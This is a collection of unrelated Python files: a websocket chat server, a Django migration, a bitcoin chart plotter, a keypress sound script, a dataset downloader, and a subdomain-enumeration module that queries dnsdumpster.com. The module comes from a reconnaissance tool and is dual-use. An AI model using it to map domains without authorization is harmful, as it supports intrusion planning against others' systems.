self.broadcast(json.dumps(to_send))
def broadcast(self, message):
for client in self.clients:
client.write_message(message)
class IndexHandler(tornado.web.RequestHandler):
def get(self):
self.render("index.html", title="chat test")
class App(tornado.web.Application):
def __init__(self):
handlers = [
(r"/", IndexHandler),
(r"/websocket", ChatWebSocket)
]
settings = dict(
template_path = os.path.join(os.path.dirname(__file__), "template"),
static_path = os.path.join(os.path.dirname(__file__), "static")
)
tornado.web.Application.__init__(self, handlers, **settings)
if __name__ == "__main__":
app = App()
app.listen(8888)
tornado.ioloop.IOLoop.current().start()
|
# Generated by Django 2.2.13 on 2020-07-10 05:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shop', '0031_auto_20200710_1127'),
]
operations = [
migrations.AlterField(
model_name='contactmessage',
name='title',
field=models.CharField(blank=True, max_length=255),
),
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This module plots hloc data.
"""
import os
import argparse
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.finance import candlestick2_ohlc, volume_overlay
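# Note: matplotlib.finance was deprecated and removed in later matplotlib releases;
# the same candlestick2_ohlc / volume_overlay helpers are provided by the separate
# mpl_finance package (an assumption about the runtime environment, not something
# this script checks).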
import logger
class PlotChart(object):
"""
    This class plots the hloc btc data.
"""
def __init__(self, root_logger, input_file):
# type: (logger, str) -> None
"""
Class initialization
"""
self.logger = root_logger
self.input_file = input_file
def run(self):
# type: () -> None
"""
Read and plot the hloc file specified by the argument.
:return:
"""
        # Check that the input file exists
if not os.path.exists(self.input_file):
            self.logger.logger.error('Input file does not exist: {}'.format(self.input_file))
exit(1)
        # Load the hloc data
df_btc = self.load_btc_data()
        # Reference: http://www.madopro.net/entry/bitcoin_chart
        # Plot the candlesticks
fig = plt.figure(figsize=(18, 9))
ax = plt.subplot(1, 1, 1)
candlestick2_ohlc(ax, df_btc["first"], df_btc["max"], df_btc["min"], df_btc["last"], width=0.9, colorup="b", colordown="r")
        # Set up the x-axis tick labels
ax.set_xticklabels([(df_btc.index[int(x)] if x < df_btc.shape[0] else x) for x in ax.get_xticks()], rotation=90)
ax.set_xlim([0, df_btc.shape[0]])
ax.set_ylabel("Price")
ax.grid()
        # Adjust the candlestick plot's vertical range
bottom, top = ax.get_ylim()
ax.set_ylim(bottom - (top - bottom) / 4, top)
        # Overlay the volume plot on a secondary axis
ax2 = ax.twinx()
volume_overlay(ax2, df_btc["first"], df_btc["last"], df_btc["size"], width=1, colorup="g", colordown="g")
ax2.set_xlim([0, df_btc.shape[0]])
        # Scale the volume axis
ax2.set_ylim([0, df_btc["size"].max() * 4])
ax2.set_ylabel("Volume")
plt.show()
def load_btc_data(self):
        # type: () -> pd.DataFrame
"""
Load hloc btc data.
:return: hloc btc data frame
"""
df_btc = pd.read_csv(self.input_file, index_col='datetime')
self.logger.logger.info('Load btc file: {}'.format(self.input_file))
return df_btc
if __name__ == '__main__':
parser = argparse.ArgumentParser()
    parser.add_argument('-f', '--file', help='file name (including directory path).',
action='store',
required=True)
args = parser.parse_args()
logger = logger.Logger()
logger.logger.info('START plotchart')
plot_chart = PlotChart(logger, args.file)
plot_chart.run()
|
import time
from dnsdumpster.DNSDumpsterAPI import DNSDumpsterAPI
from simplydomain.src import core_serialization
from simplydomain.src import module_helpers
from simplydomain.src import core_scrub
# use RequestsHelpers() class to make requests to target URL
class DynamicModule(module_helpers.RequestsHelpers):
"""
Dynamic module class that will be loaded and called
at runtime. This will allow modules to easily be independent of the
core runtime.
"""
def __init__(self, json_entry):
"""
Init class structure. Each module takes a JSON entry object which
        can pass different values to the module without changing the API.
        Adapted from the Empire Project:
https://github.com/EmpireProject/Empire/blob/master/lib/modules/python_template.py
:param json_entry: JSON data object passed to the module.
"""
module_helpers.RequestsHelpers.__init__(self)
self.json_entry = json_entry
self.info = {
# mod name
'Module': 'dnsdumpster_search.py',
# long name of the module to be used
'Name': 'Python API for Dnsdumpster',
# version of the module to be used
'Version': '1.0',
# description
'Description': ['(Unofficial) Python API for',
'https://dnsdumpster.com/ using @paulsec lib.'],
# authors or sources to be quoted
'Authors': ['@Killswitch-GUI', '@PaulSec'],
# list of resources or comments
'comments': [
                'Searches for previously seen domains, as well as the data that goes with them.'
]
}
self.options = {
'threads': '',
'url': 'https://dnsdumpster.com',
}
def dynamic_main(self, queue_dict):
"""
Main entry point for process to call.
core_serialization.SubDomain Attributes:
name: long name of method
module_name: name of the module that performed collection
source: source of the subdomain or resource of collection
module_version: version from meta
time: time the result obj was built
subdomain: subdomain to use
valid: is domain valid
:return: NONE
"""
core_args = self.json_entry['args']
task_output_queue = queue_dict['task_output_queue']
cs = core_scrub.Scrub()
data = DNSDumpsterAPI().search(str(core_args.DOMAIN))
for d in data['dns_records']['host']:
cs.subdomain = d['domain']
# check if domain name is valid
valid = cs.validate_domain()
# build the SubDomain Object to pass
sub_obj = core_serialization.SubDomain(
self.info["Name"],
self.info["Module"],
self.options['url'],
self.info["Version"],
time.time(),
d['domain'],
valid
)
# populate queue with return data object
task_output_queue.put(sub_obj)
|
import msvcrt
import playsound
while True:
if msvcrt.kbhit():
key = msvcrt.getch()
#print(key) # just to show the result
        if key in (b'\r', b'\n'):  # getch() returns one byte at a time, so CR and LF arrive separately
playsound.playsound('./sound.mp3', True)
print(key)
|
# -*- coding: utf-8 -*-
import os
import requests
from tqdm import tqdm
def download(src, url):
file_size = int(requests.head(url).headers['Content-Length'])
header = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
'70.0.3538.67 Safari/537.36'
}
pbar = tqdm(total=file_size)
resp = requests.get(url, headers=header, stream=True)
    with open(src, 'wb') as f:
for chunk in resp.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
                pbar.update(len(chunk))
pbar.close()
return file_size
abs_path = os.path.abspath(__file__)
data_dir = os.path.join(os.path.dirname(abs_path), "data")
if not os.path.exists(data_dir) or not os.path.isdir(data_dir):
os.makedirs(data_dir)
download_url = "http://qim.fs.quoracdn.net/quora_duplicate_questions.tsv"
download_path = os.path.join(data_dir, "quora_duplicate_questions.tsv")
download(download_path, download_url)
|